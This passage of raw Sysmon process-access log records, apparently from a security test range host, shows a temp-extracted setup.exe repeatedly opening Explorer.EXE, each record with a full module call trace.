ge.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 